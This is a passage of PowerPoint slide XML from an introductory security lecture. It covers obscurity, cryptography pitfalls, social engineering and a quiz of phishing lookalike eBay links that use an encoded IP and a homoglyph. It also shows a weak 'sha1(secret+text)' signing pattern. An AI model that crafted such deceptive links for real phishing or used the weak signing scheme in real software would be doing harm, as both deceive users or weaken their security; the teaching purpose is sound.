              <a:t>if security of a system depends on one secret, then, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>once it’s no longer a secret, the whole system is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>secret algorithms, protocols etc. will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reviewed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> flaws won’t be spotted and fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>less security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Systems should be secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>, not by obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="210000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> obscurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29700" name="Picture 4" descr="MCj0232525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5113" y="1651000"/>
            <a:ext cx="1185862" cy="1011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Cryptography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Cryptography is a great security tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…but it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>solve many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. buffer overflows bugs, users choosing bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Don’t invent or implement cryptographic algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protect private keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use longer keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(e.g. RSA 4096 rather than 1024)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid weak algorithms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(e.g. SHA2 rather than SHA1,MD5)</a:t>
            </a:r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Use hash functions for simple signing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="446087" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = sha1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>secret+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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699773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Further reading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endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Bruce Schneier </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Secrets and Lies: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Digital Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	in a Networked World</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32772" name="Picture 4" descr="cover-sandl-200h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6338" y="1838325"/>
            <a:ext cx="1976437" cy="292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Human – the weakest link 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90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Fun addition to the SANS Top 20 Vulnerabilities list:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H1. Humans</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H1.1 Description:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The species Homo sapiens supports a wide range of intellectual capabilities such as speech, emotion, rational thinking etc. Many of these components are enabled by default - though to differing degrees of success. […] Vulnerabilities in these components are the most common avenues for exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The human brain is both locally and remotely exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> through techniques such as unhealthy self-talk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>low self-esteem, government propaganda, commercial marketing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sales representatives, phishing, social engineering, and magic tricks. For most of these vulnerabilities, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit code is publicly available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. Attacks exploiting these vulnerabilities have been seen in the wild. […] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0"/>
              <a:t>(full text at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" u="sng" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://rwanner.blogspot.com/2005/11/human-side-of-security.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0"/>
              <a:t>)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Social engineering threats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5000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting human nature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>: tendency to trust, fear etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Human is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weakest element</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> of most security systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to gain unauthorized access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> to systems or information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Deceiving, manipulating, influencing people, abusing their trust </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>so that they do something they wouldn’t normally do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Most common: phishing, hoaxes, fake URLs and web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Also: cheating over a phone, gaining physical access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>example: requesting e-mail password change by calling technical support (pretending to be an angry boss)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Often using (semi-)public information to gain more knowledge:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>employees’ names, who’s on a leave, what’s the hierarchy, projects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>people get easily persuaded to give out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>everyone knows valuable pieces of information, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>not only the management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Social engineering – reducing risks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Clear, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>understandable security policies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Education</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, training, awareness raising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Who to trust? Who not to trust? How to distinguish?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Not all non-secret information should be public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> shouldn’t let people do stupid things:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Warn when necessary, but not more often</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Avoid ambiguity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Don’t expect users to take right security decisions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think as user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, see how people use your software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Software engineers think different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t> than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Request an external audit?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Outline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mtClean="0"/>
              <a:t>Some recent cyber-security stories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What is computer security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>How much security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Threat modeling and risk assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection, detection, reaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security through obscurity?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social engineering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Social engineering – rouge URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="1477963"/>
            <a:ext cx="7705725" cy="4392612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/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Which links point to eBay?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2127250"/>
            <a:ext cx="7561262" cy="374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Clr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure-ebay.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.ebay.com\cgi-bin\login?ds=1%204324@%31%32%34.%3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1%33%36%2e%31%30%2e%32%30%33/p?uh3f223d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.ebaỵ.com/ws/eBayISAPI.dll?SignIn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" u="sng">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
